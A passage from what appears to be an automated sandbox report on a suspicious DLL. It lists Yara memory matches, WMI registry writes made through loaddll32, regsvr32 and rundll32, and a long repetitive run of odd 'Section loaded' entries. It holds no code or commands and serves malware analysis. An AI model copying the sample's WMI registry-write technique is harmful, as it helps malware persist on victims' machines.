            Source: Yara matchFile source: 00000000.00000003.391496685.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355040596.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314318653.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311152381.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391727857.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311865061.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311345831.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391695930.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.311422020.0000000006CB8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.370336241.0000000006AE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311203958.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.313929901.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311769510.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311540194.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.314268795.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355268021.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.361195316.00000000074A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391358945.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370621844.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311670564.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313872965.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391766298.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311984449.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.312268208.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.314181933.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391634804.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313395188.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366812647.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355464241.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366846077.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370930604.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.528368895.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.525372552.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311633818.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.328237107.0000000005588000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.526965041.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366987894.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370755681.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.346412042.0000000006C48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370579660.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314563024.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355144752.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366907200.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391423871.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.354973566.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313701626.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391783104.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391671709.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366961006.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311364814.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366875687.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313576458.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311042721.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391794887.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370911517.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391520743.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311282599.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355518422.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.310694636.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391596036.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.314078107.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314146839.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311573394.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370793730.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.527384744.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.367026517.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 2880, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3556, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5040, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2624, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5352, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6276, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6536, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6708, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7000, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1496, type: MEMORYSTR

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: MGrYFpGLQ7.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Windows\System32\loaddll32.exeSection loaded: lpk.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: msafd.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: @ .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ? .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: > .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: = .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: < .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ; .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: : .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 9 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 8 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 7 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 6 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 5 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 4 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 3 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 2 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 1 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 0 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: - .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: , .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: + .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: * .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ) .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ( .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: & .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: % .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: $ .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: # .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ! .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ~ .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: } .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: | .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: { .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: i .dllJump to behavior
